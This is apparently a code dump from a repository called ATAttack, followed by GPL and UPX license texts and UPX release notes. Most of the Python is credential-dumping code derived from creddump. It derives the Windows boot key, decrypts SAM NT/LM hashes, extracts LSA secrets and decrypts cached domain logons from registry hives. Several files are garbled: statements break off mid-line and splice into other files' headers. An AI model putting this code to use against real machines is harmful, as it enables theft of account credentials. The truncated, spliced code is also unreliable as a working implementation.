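                current_type_size = builtin_size(current_type)
            else:
                current_type_size = obj_size(types, current_type)
            index = path.pop()
            offset += index * current_type_size
            continue

        # Fix: dict.has_key() does not exist on Python 3; `in` works on both.
        elif current_type not in types:
            raise Exception('Invalid type ' + current_type)

        member_dict = types[current_type][1]

        current_member = path.pop()
        if current_member not in member_dict:
            raise Exception('Invalid member %s in type %s' % (current_member, current_type))

        offset += member_dict[current_member][0]

        current_type = member_dict[current_member][1][0]

    return (offset, current_type)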
158 |
159 |
def read_obj(addr_space, types, member_list, vaddr):
    """
    Read the low-level value for some complex type's member.
    The type must have members.

    ``member_list`` is ``[type_name, member, ...]``; the resolved member
    must be a builtin scalar (read_value raises otherwise).
    """
    if len(member_list) < 2:
        raise Exception('Invalid type/member ' + str(member_list))

    member_offset, member_type = get_obj_offset(types, member_list)
    return read_value(addr_space, member_type, vaddr + member_offset)
172 |
--------------------------------------------------------------------------------
/ATAttack/framework/prints.py:
--------------------------------------------------------------------------------
1 | from __future__ import print_function
2 | from colorama import init, Fore
3 | import random
4 | import string
5 |
6 | init(convert=True)
7 |
8 |
class Constant:
    """Process-wide sink for every message the print_*/table_* helpers emit."""
    # (level, text) tuples in emission order; rebound by reset_output().
    output = list()
11 |
12 |
def reset_output():
    """Forget every recorded message (rebinds the list; does not clear in place)."""
    Constant.output = list()
15 |
16 |
def table_success(id, message):
    """Print a green-labelled table row and record it with level "ok".

    ``id`` shadows the builtin; kept because callers may pass it by name.
    Note the recorded text is ``id + message`` with no separator.
    """
    print("%s %s%s%s" % (Fore.GREEN, id, Fore.RESET, message))
    Constant.output.append(("ok", id + message))
20 |
21 |
def table_error(id, message):
    """Print a red-labelled table row and record it with level "error".

    ``id`` shadows the builtin; kept because callers may pass it by name.
    Note the recorded text is ``id + message`` with no separator.
    """
    print("%s %s%s%s" % (Fore.RED, id, Fore.RESET, message))
    Constant.output.append(("error", id + message))
25 |
26 |
def print_success(message):
    """Print ``message`` behind a green "[+]" marker and record it as "ok"."""
    print("%s [+] %s%s" % (Fore.GREEN, Fore.RESET, message))
    Constant.output.append(("ok", message))
30 |
31 |
def print_error(message):
    """Print ``message`` behind a red "[-]" marker and record it as "error"."""
    print("%s [-] %s%s" % (Fore.RED, Fore.RESET, message))
    Constant.output.append(("error", message))
35 |
36 |
def print_info(message):
    """Print ``message`` behind a cyan "[!]" marker and record it as "info"."""
    print("%s [!] %s%s" % (Fore.CYAN, Fore.RESET, message))
    Constant.output.append(("info",  message))
40 |
41 |
def print_warning(message):
    """Print ``message`` behind a yellow "[!]" marker and record it as "warning".

    Uses the same "[!]" marker as print_info; only the colour and the
    recorded level differ.
    """
    print("%s [!] %s%s" % (Fore.YELLOW, Fore.RESET, message))
    Constant.output.append(("warning", message))
45 |
def s_rangdom():
    """Return 8 distinct random alphanumeric characters.

    random.sample() never repeats a character, which trims the keyspace,
    and `random` is not a CSPRNG: fine for a throwaway name, not for
    anything that must be unguessable.
    """
    alphabet = string.ascii_letters + string.digits
    return "".join(random.sample(alphabet, 8))
48 |
--------------------------------------------------------------------------------
/ATAttack/framework/types.py:
--------------------------------------------------------------------------------
1 | # This file is part of creddump.
2 | #
3 | # creddump is free software: you can redistribute it and/or modify
4 | # it under the terms of the GNU General Public License as published by
5 | # the Free Software Foundation, either version 3 of the License, or
6 | # (at your option) any later version.
7 | #
8 | # creddump is distributed in the hope that it will be useful,
9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
11 | # GNU General Public License for more details.
12 | #
13 | # You should have received a copy of the GNU General Public License
14 | # along with creddump. If not, see <http://www.gnu.org/licenses/>.
15 |
16 | """
17 | @author: Brendan Dolan-Gavitt
18 | @license: GNU General Public License 2.0 or later
19 | @contact: bdolangavitt@wesleyan.edu
20 | """
21 |
# Registry hive cell layouts: name -> [size, {member: [offset, [type, ...]]}].
# Offsets are the 32-bit on-disk layouts (cell offsets are 4 bytes).
# SubKeyLists and ChildHiveReference share offset 0x1c (a union in the real
# structure).  _LARGE_INTEGER and _CM_KEY_REFERENCE are referenced but not
# defined here, so those members can only be located, not sized or walked.
regtypes = {
    '_CM_KEY_VALUE': [0x18, {
        'Signature':  [0x0,  ['unsigned short']],
        'NameLength': [0x2,  ['unsigned short']],
        'DataLength': [0x4,  ['unsigned long']],
        'Data':       [0x8,  ['unsigned long']],
        'Type':       [0xc,  ['unsigned long']],
        'Flags':      [0x10, ['unsigned short']],
        'Spare':      [0x12, ['unsigned short']],
        'Name':       [0x14, ['array', 1, ['unsigned short']]],
    }],
    '_CM_KEY_NODE': [0x50, {
        'Signature':          [0x0,  ['unsigned short']],
        'Flags':              [0x2,  ['unsigned short']],
        'LastWriteTime':      [0x4,  ['_LARGE_INTEGER']],
        'Spare':              [0xc,  ['unsigned long']],
        'Parent':             [0x10, ['unsigned long']],
        'SubKeyCounts':       [0x14, ['array', 2, ['unsigned long']]],
        'SubKeyLists':        [0x1c, ['array', 2, ['unsigned long']]],
        'ValueList':          [0x24, ['_CHILD_LIST']],
        'ChildHiveReference': [0x1c, ['_CM_KEY_REFERENCE']],
        'Security':           [0x2c, ['unsigned long']],
        'Class':              [0x30, ['unsigned long']],
        'MaxNameLen':         [0x34, ['unsigned long']],
        'MaxClassLen':        [0x38, ['unsigned long']],
        'MaxValueNameLen':    [0x3c, ['unsigned long']],
        'MaxValueDataLen':    [0x40, ['unsigned long']],
        'WorkVar':            [0x44, ['unsigned long']],
        'NameLength':         [0x48, ['unsigned short']],
        'ClassLength':        [0x4a, ['unsigned short']],
        'Name':               [0x4c, ['array', 1, ['unsigned short']]],
    }],
    '_CM_KEY_INDEX': [0x8, {
        'Signature': [0x0, ['unsigned short']],
        'Count':     [0x2, ['unsigned short']],
        'List':      [0x4, ['array', 1, ['unsigned long']]],
    }],
    '_CHILD_LIST': [0x8, {
        'Count': [0x0, ['unsigned long']],
        'List':  [0x4, ['unsigned long']],
    }],
}
64 |
--------------------------------------------------------------------------------
/ATAttack/framework/win32/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c1y2m3/ATAttack/b3df31d57061900246ab68ba240b26a42a02002c/ATAttack/framework/win32/__init__.py
--------------------------------------------------------------------------------
/ATAttack/framework/win32/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c1y2m3/ATAttack/b3df31d57061900246ab68ba240b26a42a02002c/ATAttack/framework/win32/__init__.pyc
--------------------------------------------------------------------------------
/ATAttack/framework/win32/domcachedump.py:
--------------------------------------------------------------------------------
1 | # This file is part of creddump.
2 | #
3 | # creddump is free software: you can redistribute it and/or modify
4 | # it under the terms of the GNU General Public License as published by
5 | # the Free Software Foundation, either version 3 of the License, or
6 | # (at your option) any later version.
7 | #
8 | # creddump is distributed in the hope that it will be useful,
9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
11 | # GNU General Public License for more details.
12 | #
13 | # You should have received a copy of the GNU General Public License
14 | # along with creddump. If not, see <http://www.gnu.org/licenses/>.
15 |
16 | """
17 | @author: Brendan Dolan-Gavitt
18 | @license: GNU General Public License 2.0 or later
19 | @contact: bdolangavitt@wesleyan.edu
20 | """
21 |
22 | from framework.win32.rawreg import *
23 | from framework.addrspace import HiveFileAddressSpace
24 | from framework.win32.hashdump import get_bootkey
25 | from framework.win32.lsasecrets import get_secret_by_name,get_lsa_key
26 | from Crypto.Hash import HMAC
27 | from Crypto.Cipher import ARC4
28 | from struct import unpack
29 |
def get_nlkm(secaddr, lsakey):
    """Fetch the NL$KM LSA secret (the cached-logon key) from a SECURITY hive.

    NOTE(review): this module imports ``framework.win32...`` while
    hashdump.py imports ``ATAttack.framework...``; only one of those roots
    is normally importable, so check which one the deployment puts on
    sys.path.
    """
    secret_name = 'NL$KM'
    return get_secret_by_name(secaddr, secret_name, lsakey)
32 |
def decrypt_hash(edata, nlkm, ch):
    """Decrypt one cached-credential blob.

    The RC4 key is HMAC-MD5(nlkm, ch) (pycrypto's HMAC defaults to MD5);
    RC4 is symmetric, so encrypt() is the decryption.  NOTE(review): this
    keying matches the RC4-based cache format only -- confirm the caller
    does not hand it blobs from newer hives that use a different scheme.
    """
    rc4_key = HMAC.new(nlkm, ch).digest()
    return ARC4.new(rc4_key).encrypt(edata)
40 |
41 | def parse_cache_entry(cache_data):
42 | (uname_len, domain_len) = unpack(".
15 |
16 | """
17 | @author: Brendan Dolan-Gavitt
18 | @license: GNU General Public License 2.0 or later
19 | @contact: bdolangavitt@wesleyan.edu
20 | """
21 |
import binascii
from struct import pack, unpack

from Crypto.Cipher import ARC4, DES
from Crypto.Hash import MD5

from ATAttack.framework.addrspace import HiveFileAddressSpace
from ATAttack.framework.win32.rawreg import *
27 |
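def _with_odd_parity(byte):
    """Keep the top 7 bits of ``byte`` and set bit 0 so the byte has odd parity."""
    high = byte & 0xFE
    ones = bin(high).count('1')
    return high | (0 if ones % 2 else 1)

# DES odd-parity table: odd_parity[i] is i with its low bit replaced by the
# parity bit (e.g. 0 -> 1, 2 -> 2, 6 -> 7, 18 -> 19, 252 -> 253).
odd_parity = [_with_odd_parity(i) for i in range(256)]

# Permutation matrix for boot key (16 entries: the boot key must be 16 bytes)
p = [ 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3,
      0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 ]

# Constants for SAM decrypt algorithm (NUL-terminated, as they are hashed
# together with the raw key material below)
aqwerty = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
anum = "0123456789012345678901234567890123456789\0"
antpassword = "NTPASSWORD\0"
almpassword = "LMPASSWORD\0"

# Hashes of the empty password; used to recognise accounts with no LM/NT hash.
# Fix: str.decode('hex') is Python 2 only; binascii works on both.
empty_lm = binascii.unhexlify("aad3b435b51404eeaad3b435b51404ee")
empty_nt = binascii.unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0")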
59 |
def str_to_key(s):
    """Expand the first 7 bytes of ``s`` into an 8-byte DES key.

    The 56 input bits are split into eight 7-bit groups (most significant
    first); each group is shifted left one place and given odd parity via
    odd_parity.  Raises IndexError when ``s`` is shorter than 7 characters.
    """
    bits = 0
    for i in range(7):
        bits = (bits << 8) | ord(s[i])

    key = []
    # Groups sit at bits 55..49, 48..42, ..., 6..0 of the 56-bit value.
    for shift in range(49, -1, -7):
        seven = (bits >> shift) & 0x7F
        key.append(odd_parity[seven << 1])
    return "".join(chr(k) for k in key)
74 |
def sid_to_key(sid):
    """Derive the two DES keys used to protect a user's SAM hashes from its RID.

    Despite the name ``sid`` is the 32-bit RID.  Its little-endian bytes
    l0..l3 are laid out as l0 l1 l2 l3 l0 l1 l2 for the first key and
    rotated to l3 l0 l1 l2 l3 l0 l1 for the second.
    """
    le = [chr((sid >> shift) & 0xFF) for shift in (0, 8, 16, 24)]
    s1 = "".join(le + le[:3])

    rotated = [le[3], le[0], le[1], le[2]]
    s2 = "".join(rotated + rotated[:3])

    return str_to_key(s1), str_to_key(s2)
88 |
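def find_control_set(sysaddr):
    """Return the ControlSet number selected by HKLM\\SYSTEM\\Select\\Current.

    Falls back to 1 whenever the hive root, the Select key or the Current
    value cannot be found.
    """
    root = get_root(sysaddr)
    if not root:
        return 1

    csselect = open_key(root, ["Select"])
    if not csselect:
        return 1

    for v in values(csselect):
        if v.Name == "Current": return v.Data.value

    # Fix: falling off the loop returned None, which then broke the
    # "ControlSet%03d" formatting in get_bootkey; use the same default as
    # the other failure paths.
    return 1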
100 |
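def get_bootkey(sysaddr):
    """Recover the 16-byte boot key (SYSKEY) from a SYSTEM hive.

    The key is the concatenated, hex-decoded class data of the JD, Skew1,
    GBG and Data sub-keys of ControlSetNNN\\Control\\Lsa, permuted by ``p``.
    Returns None when any of those keys or their class data is missing or
    the assembled key is not exactly 16 bytes.
    """
    cs = find_control_set(sysaddr)
    lsa_base = ["ControlSet%03d" % cs, "Control", "Lsa"]
    lsa_keys = ["JD","Skew1","GBG","Data"]

    root = get_root(sysaddr)
    if not root: return None

    lsa = open_key(root, lsa_base)
    if not lsa: return None

    bootkey = ""

    for lk in lsa_keys:
        key = open_key(lsa, [lk])
        # Fix: a missing sub-key used to raise AttributeError on key.Class.
        if not key: return None
        class_data = sysaddr.read(key.Class.value, key.ClassLength.value)
        if not class_data: return None
        # Class data is UTF-16LE text holding hex digits.
        bootkey += class_data.decode('utf-16-le').decode('hex')

    # Fix: p has 16 entries, so any other length used to end in IndexError.
    if len(bootkey) != len(p):
        return None

    bootkey_scrambled = ""
    for i in range(len(bootkey)):
        bootkey_scrambled += bootkey[p[i]]

    return bootkey_scrambled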
124 |
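def get_hbootkey(samaddr, bootkey):
    """Derive the hashed boot key from the SAM\\Domains\\Account 'F' value.

    rc4_key = MD5(F[0x70:0x80] + aqwerty + bootkey + anum); the result is
    RC4(rc4_key) over F[0x80:0xA0].  Returns None when the key or value is
    missing, or the F blob is too short to hold both slices.
    NOTE(review): this is the RC4/MD5 scheme only -- confirm the hives you
    feed in are not the newer format that protects F differently.
    """
    sam_account_path = ["SAM", "Domains", "Account"]

    root = get_root(samaddr)
    if not root: return None

    sam_account_key = open_key(root, sam_account_path)
    if not sam_account_key: return None

    F = None
    for v in values(sam_account_key):
        if v.Name == 'F':
            F = samaddr.read(v.Data.value, v.DataLength.value)
    # Fix: a short F used to slice silently and yield a garbage key.
    if not F or len(F) < 0xA0: return None

    md5 = MD5.new()
    md5.update(F[0x70:0x80] + aqwerty + bootkey + anum)
    rc4_key = md5.digest()

    rc4 = ARC4.new(rc4_key)
    hbootkey = rc4.encrypt(F[0x80:0xA0])

    return hbootkey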
148 |
def get_user_keys(samaddr):
    """Return the subkeys of SAM\\Domains\\Account\\Users except "Names".

    Each returned key is one per-user record to be decrypted by the
    caller. An empty list is returned when the hive root or the Users
    key cannot be opened.
    """
    root = get_root(samaddr)
    if not root:
        return []

    users_key = open_key(root, ["SAM", "Domains", "Account", "Users"])
    if not users_key:
        return []

    user_keys = []
    for sub in subkeys(users_key):
        if sub.Name == "Names":
            continue
        user_keys.append(sub)
    return user_keys
159 |
160 | def decrypt_single_hash(rid, hbootkey, enc_hash, lmntstr):
161 | (des_k1,des_k2) = sid_to_key(rid)
162 | d1 = DES.new(des_k1, DES.MODE_ECB)
163 | d2 = DES.new(des_k2, DES.MODE_ECB)
164 |
165 | md5 = MD5.new()
166 | md5.update(hbootkey[:0x10] + pack(".
15 |
16 | """
17 | @author: Brendan Dolan-Gavitt
18 | @license: GNU General Public License 2.0 or later
19 | @contact: bdolangavitt@wesleyan.edu
20 | """
21 |
22 | from framework.win32.rawreg import *
23 | from framework.addrspace import HiveFileAddressSpace
24 | from framework.win32.hashdump import get_bootkey,str_to_key
25 | from Crypto.Hash import MD5
26 | from Crypto.Cipher import ARC4,DES
27 |
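def get_lsa_key(secaddr, bootkey):
    """Recover the LSA secrets key from SECURITY\\Policy\\PolSecretEncryptionKey.

    rc4_key = MD5(bootkey || 1000 x obf[60:76])
    lsa_key = RC4(rc4_key, obf[12:60])[0x10:0x20]

    Returns None when ``bootkey`` is empty, when the hive root, the key,
    its first value or the value data is unavailable, or when the data
    is shorter than the 76 bytes the slices above require (the original
    code silently processed a short blob).

    NOTE(review): PolSecretEncryptionKey is the pre-Vista key; newer
    SECURITY hives are reported to use PolEKList with a different
    scheme, which this function does not handle -- a None result may
    simply mean a newer hive, confirm before concluding.
    """
    if not bootkey:
        return None

    root = get_root(secaddr)
    if not root:
        return None

    enc_reg_key = open_key(root, ["Policy", "PolSecretEncryptionKey"])
    if not enc_reg_key:
        return None

    enc_reg_value = enc_reg_key.ValueList.List[0]
    if not enc_reg_value:
        return None

    obf_lsa_key = secaddr.read(enc_reg_value.Data.value,
                               enc_reg_value.DataLength.value)
    if not obf_lsa_key or len(obf_lsa_key) < 76:
        return None

    # Key derivation: hash the boot key, then the 16-byte salt 1000 times.
    md5 = MD5.new()
    md5.update(bootkey)
    for i in range(1000):
        md5.update(obf_lsa_key[60:76])
    rc4key = md5.digest()

    rc4 = ARC4.new(rc4key)
    lsa_key = rc4.decrypt(obf_lsa_key[12:60])

    return lsa_key[0x10:0x20]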
56 |
57 | def decrypt_secret(secret, key):
58 | """Python implementation of SystemFunction005.
59 |
60 | Decrypts a block of data with DES using given key.
61 | Note that key can be longer than 7 bytes."""
62 | decrypted_data = ''
63 | j = 0 # key index
64 | for i in range(0,len(secret),8):
65 | enc_block = secret[i:i+8]
66 | block_key = key[j:j+7]
67 | des_key = str_to_key(block_key)
68 |
69 | des = DES.new(des_key, DES.MODE_ECB)
70 | decrypted_data += des.decrypt(enc_block)
71 |
72 | j += 7
73 | if len(key[j:j+7]) < 7:
74 | j = len(key[j:j+7])
75 |
76 | (dec_data_len,) = unpack(".
15 |
16 | """
17 | @author: Brendan Dolan-Gavitt
18 | @license: GNU General Public License 2.0 or later
19 | @contact: bdolangavitt@wesleyan.edu
20 | """
21 |
22 | from ATAttack.framework.newobj import Obj,Pointer
23 | from struct import unpack
24 |
25 | ROOT_INDEX = 0x20
26 | LH_SIG = unpack("
294 | Copyright (C) <year>  <name of author>
295 |
296 | This program is free software; you can redistribute it and/or modify
297 | it under the terms of the GNU General Public License as published by
298 | the Free Software Foundation; either version 2 of the License, or
299 | (at your option) any later version.
300 |
301 | This program is distributed in the hope that it will be useful,
302 | but WITHOUT ANY WARRANTY; without even the implied warranty of
303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
304 | GNU General Public License for more details.
305 |
306 | You should have received a copy of the GNU General Public License along
307 | with this program; if not, write to the Free Software Foundation, Inc.,
308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
309 |
310 | Also add information on how to contact you by electronic and paper mail.
311 |
312 | If the program is interactive, make it output a short notice like this
313 | when it starts in an interactive mode:
314 |
315 | Gnomovision version 69, Copyright (C) year name of author
316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
317 | This is free software, and you are welcome to redistribute it
318 | under certain conditions; type `show c' for details.
319 |
320 | The hypothetical commands `show w' and `show c' should show the appropriate
321 | parts of the General Public License. Of course, the commands you use may
322 | be called something other than `show w' and `show c'; they could even be
323 | mouse-clicks or menu items--whatever suits your program.
324 |
325 | You should also get your employer (if you work as a programmer) or your
326 | school, if any, to sign a "copyright disclaimer" for the program, if
327 | necessary. Here is a sample; alter the names:
328 |
329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program
330 | `Gnomovision' (which makes passes at compilers) written by James Hacker.
331 |
332 | <signature of Ty Coon>, 1 April 1989
333 | Ty Coon, President of Vice
334 |
335 | This General Public License does not permit incorporating your program into
336 | proprietary programs. If your program is a subroutine library, you may
337 | consider it more useful to permit linking proprietary applications with the
338 | library. If this is what you want to do, use the GNU Lesser General
339 | Public License instead of this License.
340 |
--------------------------------------------------------------------------------
/upx-3.95-win64/LICENSE:
--------------------------------------------------------------------------------
1 | -----BEGIN PGP SIGNED MESSAGE-----
2 |
3 |
4 | ooooo ooo ooooooooo. ooooooo ooooo
5 | `888' `8' `888 `Y88. `8888 d8'
6 | 888 8 888 .d88' Y888..8P
7 | 888 8 888ooo88P' `8888'
8 | 888 8 888 .8PY888.
9 | `88. .8' 888 d8' `888b
10 | `YbodP' o888o o888o o88888o
11 |
12 |
13 | The Ultimate Packer for eXecutables
14 | Copyright (c) 1996-2000 Markus Oberhumer & Laszlo Molnar
15 | http://wildsau.idv.uni-linz.ac.at/mfx/upx.html
16 | http://www.nexus.hu/upx
17 | http://upx.tsx.org
18 |
19 |
20 | PLEASE CAREFULLY READ THIS LICENSE AGREEMENT, ESPECIALLY IF YOU PLAN
21 | TO MODIFY THE UPX SOURCE CODE OR USE A MODIFIED UPX VERSION.
22 |
23 |
24 | ABSTRACT
25 | ========
26 |
27 | UPX and UCL are copyrighted software distributed under the terms
28 | of the GNU General Public License (hereinafter the "GPL").
29 |
30 | The stub which is imbedded in each UPX compressed program is part
31 | of UPX and UCL, and contains code that is under our copyright. The
32 | terms of the GNU General Public License still apply as compressing
33 | a program is a special form of linking with our stub.
34 |
35 | As a special exception we grant the free usage of UPX for all
36 | executables, including commercial programs.
37 | See below for details and restrictions.
38 |
39 |
40 | COPYRIGHT
41 | =========
42 |
43 | UPX and UCL are copyrighted software. All rights remain with the authors.
44 |
45 | UPX is Copyright (C) 1996-2000 Markus Franz Xaver Johannes Oberhumer
46 | UPX is Copyright (C) 1996-2000 Laszlo Molnar
47 |
48 | UCL is Copyright (C) 1996-2000 Markus Franz Xaver Johannes Oberhumer
49 |
50 |
51 | GNU GENERAL PUBLIC LICENSE
52 | ==========================
53 |
54 | UPX and the UCL library are free software; you can redistribute them
55 | and/or modify them under the terms of the GNU General Public License as
56 | published by the Free Software Foundation; either version 2 of
57 | the License, or (at your option) any later version.
58 |
59 | UPX and UCL are distributed in the hope that they will be useful,
60 | but WITHOUT ANY WARRANTY; without even the implied warranty of
61 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
62 | GNU General Public License for more details.
63 |
64 | You should have received a copy of the GNU General Public License
65 | along with this program; see the file COPYING.
66 |
67 |
68 | SPECIAL EXCEPTION FOR COMPRESSED EXECUTABLES
69 | ============================================
70 |
71 | The stub which is imbedded in each UPX compressed program is part
72 | of UPX and UCL, and contains code that is under our copyright. The
73 | terms of the GNU General Public License still apply as compressing
74 | a program is a special form of linking with our stub.
75 |
76 | Hereby Markus F.X.J. Oberhumer and Laszlo Molnar grant you special
77 | permission to freely use and distribute all UPX compressed programs
78 | (including commercial ones), subject to the following restrictions:
79 |
80 | 1. You must compress your program with a completely unmodified UPX
81 | version; either with our precompiled version, or (at your option)
82 | with a self compiled version of the unmodified UPX sources as
83 | distributed by us.
84 | 2. This also implies that the UPX stub must be completely unmodfied, i.e.
85 | the stub imbedded in your compressed program must be byte-identical
86 | to the stub that is produced by the official unmodified UPX version.
87 | 3. The decompressor and any other code from the stub must exclusively get
88 | used by the unmodified UPX stub for decompressing your program at
89 | program startup. No portion of the stub may get read, copied,
90 | called or otherwise get used or accessed by your program.
91 |
92 |
93 | ANNOTATIONS
94 | ===========
95 |
96 | - You can use a modified UPX version or modified UPX stub only for
97 | programs that are compatible with the GNU General Public License.
98 |
99 | - We grant you special permission to freely use and distribute all UPX
100 | compressed programs. But any modification of the UPX stub (such as,
101 | but not limited to, removing our copyright string or making your
102 | program non-decompressible) will immediately revoke your right to
103 | use and distribute a UPX compressed program.
104 |
105 | - UPX is not a software protection tool; by requiring that you use
106 | the unmodified UPX version for your proprietary programs we
107 | make sure that any user can decompress your program. This protects
108 | both you and your users as nobody can hide malicious code -
109 | any program that cannot be decompressed is highly suspicious
110 | by definition.
111 |
112 | - You can integrate all or part of UPX and UCL into projects that
113 | are compatible with the GNU GPL, but obviously you cannot grant
114 | any special exceptions beyond the GPL for our code in your project.
115 |
116 | - We want to actively support manufacturers of virus scanners and
117 | similar security software. Please contact us if you would like to
118 | incorporate parts of UPX or UCL into such a product.
119 |
120 |
121 |
122 | Markus F.X.J. Oberhumer Laszlo Molnar
123 | markus.oberhumer@jk.uni-linz.ac.at ml1050@cdata.tvnet.hu
124 |
125 | Linz, Austria, 25 Feb 2000
126 |
127 |
128 |
129 | -----BEGIN PGP SIGNATURE-----
130 | Version: 2.6.3ia
131 | Charset: noconv
132 |
133 | iQCVAwUBOLaLS210fyLu8beJAQFYVAP/ShzENWKLTvedLCjZbDcwaBEHfUVcrGMI
134 | wE7frMkbWT2zmkdv9hW90WmjMhOBu7yhUplvN8BKOtLiolEnZmLCYu8AGCwr5wBf
135 | dfLoClxnzfTtgQv5axF1awp4RwCUH3hf4cDrOVqmAsWXKPHtm4hx96jF6L4oHhjx
136 | OO03+ojZdO8=
137 | =CS52
138 | -----END PGP SIGNATURE-----
139 |
--------------------------------------------------------------------------------
/upx-3.95-win64/NEWS:
--------------------------------------------------------------------------------
1 | ==================================================================
2 | User visible changes for UPX
3 | ==================================================================
4 |
5 | Changes in 3.95 (26 Aug 2018):
6 | * Flag --android-shlib to work around bad design in Android
7 | * Flag --force-pie when ET_DYN main program is not marked as DF_1_PIE
8 | * Better compatibility with varying layout of address space on Linux
9 | * Support for 4 PT_LOAD layout in ELF generated by binutils-2.31
10 | * bug fixes, particularly better diagnosis of malformed input
11 | * bug fixes - see https://github.com/upx/upx/milestone/4
12 |
13 | Changes in 3.94 (12 May 2017):
14 | * Add support for arm64-linux (aka "aarch64").
15 | * Add support for --lzma compression on 64-bit PowerPC (Thierry Fauck).
16 | * For Mach, "upx -d" will unpack a prefix of the file (and warn).
17 | * Various improvements to the ELF formats.
18 | * bug fixes - see https://github.com/upx/upx/milestone/3
19 |
20 | Changes in 3.93 (29 Jan 2017):
21 | * Fixed some win32/pe and win64/pe regressions introduced in 3.92
22 | * bug fixes - see https://github.com/upx/upx/milestone/2
23 |
24 | Changes in 3.92 (11 Dec 2016):
25 | * INFO: UPX has moved to GitHub - the new home page is https://upx.github.io
26 | * IMPORTANT: all PE formats: internal changes: reunited the diverged source
27 | files - please report all regressions into the bug tracker and try UPX 3.91
28 | in case of problems.
29 | * Support Apple MacOS 10.12 "Sierra", including more-robust de-compression.
30 | * Explicitly diagnose Go-language bad PT_LOAD; recommend hemfix.c.
31 | https://sourceforge.net/p/upx/bugs/195/ https://github.com/pwaller/goupx
32 | * Fix CERT-FI Case 829767 UPX command line tools segfaults.
33 | Received by UPX Team on 2015-May-08; originally reported
34 | by Codenomicon to NCSC-FI on 2015-01-08.
35 | The vulnerabilities were discovered by Joonas Kuorilehto and
36 | Antti Häyrynen from Codenomicon.
37 | * bug fixes - see https://github.com/upx/upx/milestone/1
38 |
39 | Changes in 3.91 (30 Sep 2013):
40 | * Added experimental support for Windows 64-bit PE files, based on
41 | work by Stefan Widmann. Please use for testing only!
42 | * bug fixes
43 |
44 | ==================================================================
45 |
46 | Changes in 3.09 (18 Feb 2013):
47 | * New option --preserve-build-id for GNU ELF.
48 | * Allow for code signing and LC_UUID on Mac OS X executables.
49 | * Allow non-contiguous LC_SEGMENTs and 0==.vmsize for Mach-O.
50 | * Allow zero-filled final page in PackUnix::canUnpack().
51 | * bug fixes
52 |
53 | Changes in 3.08 (12 Dec 2011):
54 | * Fix allocation in runtime stub for darwin.macho-entry (i386 and amd64).
55 | * Compress shared library on ELF i386 only [ld.so threatens even this case].
56 | * Attempt to support ELF on QNX 6.3.0 for armel (experimental).
57 | * Better diagnostic when ELF -fPIC is needed.
58 | * PT_NOTE improvements for *BSD.
59 | * Preserve more ELF .e_flags on ARM.
60 | * Minor code improvements for ELF stubs.
61 | * Defend against another flavor of corrupt PE header.
62 | * bug fixes
63 |
64 | Changes in 3.07 (08 Sep 2010):
65 | * win32/pe: fixed relocation handling for files with *no* TLS callbacks
66 | [severe bug introduced in 3.06]
67 |
68 | Changes in 3.06 (04 Sep 2010):
69 | * win32/pe: TLS callback support contributed by Stefan Widmann. Thanks!
70 | * bug fixes
71 |
72 | Changes in 3.05 (27 Apr 2010):
73 | * i386-linux and amd64-linux support shared libraries (DT_INIT must
74 | exist, all info needed by runtime loader must be first in .text, etc.)
75 | * Linux /proc/self/exe now is preserved by default, by leaving behind
76 | one page. New compress-time option --unmap-all-pages is available.
77 | * Withdraw support for shared libraries on Darwin (Apple Mac OS X)
78 | because upx does not understand enough about .dylib.
79 | * bug fixes
80 |
81 | Changes in 3.04 (27 Sep 2009):
82 | * new format Mach/AMD64 supports 64-bit programs on Apple Macintosh.
83 | * new formats Dylib/i386 and Dylib/ppc32 support shared libraries
84 | [such as browser plugins] on Darwin (Apple Macintosh). An existing
85 | -init function (LC_ROUTINES command) is required.
86 | * new format vmlinuz/armel for Debian NSLU2 (etc.) linux kernel
87 | * bvmlinuz boot protocol 2.08 for 386 Linux kernel
88 | * Extended ABI version 4 for armel-eabi ARM Linux ELF
89 | * bug fixes
90 |
91 | Changes in 3.03 (27 Apr 2008):
92 | * implement cache flushing for PowerPC (esp. model 440)
93 | * fix cache flushing on MIPS (>3 MiB compressed, or with holes)
94 | * fix MIPS big-endian
95 | * bug fixes
96 |
97 | Changes in 3.02 (16 Dec 2007):
98 | * fix unmapping on arm-linux.elf
99 | * fix error checking in mmap for i386-linux.elf [triggered by -fPIE]
100 | * bug fixes
101 |
102 | Changes in 3.01 (31 Jul 2007):
103 | * new options --no-mode, --no-owner and --no-time to disable preservation
104 | of mode (file permissions), file ownership and timestamps.
105 | * dos/exe: fixed an incorrect error message caused by a bug in
106 | relocation handling
107 | * new format linux/mipsel supports ELF on [32-bit] R3000
108 | * fix argv[0] on PowerPC with --lzma
109 | * bug fixes
110 |
111 | Changes in 3.00 (27 Apr 2007):
112 | * watcom/le & tmt/adam: fixed a problem when using certain filters
113 |
114 | Changes in 2.93 beta (08 Mar 2007):
115 | * new formats Mach/i386 and Mach/fat support Mac OS X i686 and
116 | Universal binaries [i686 and PowerPC only]
117 | * dos/exe: LZMA is now also supported for 16-bit dos/exe. Please note that
118 | you have to explicitly use '--lzma' even for '--ultra-brute' here
119 | because runtime decompression is about 30 times slower than NRV -
120 | which is really noticeable on old machines.
121 | * dos/exe: fixed a rarely occurring bug in relocation handling
122 | * win32/pe & arm/pe: better icon compression handling
123 |
124 | Changes in 2.92 beta (23 Jan 2007):
125 | * new option '--ultra-brute' which tries even more variants
126 | * slightly improved compression ratio for some files when
127 | using '--brute' or '--ultra-brute'
128 | * bug fixes
129 |
130 | Changes in 2.91 beta (29 Nov 2006):
131 | * assorted bug fixes
132 | * arm/pe: fix "missing" icon & version info resource problem for wince 5
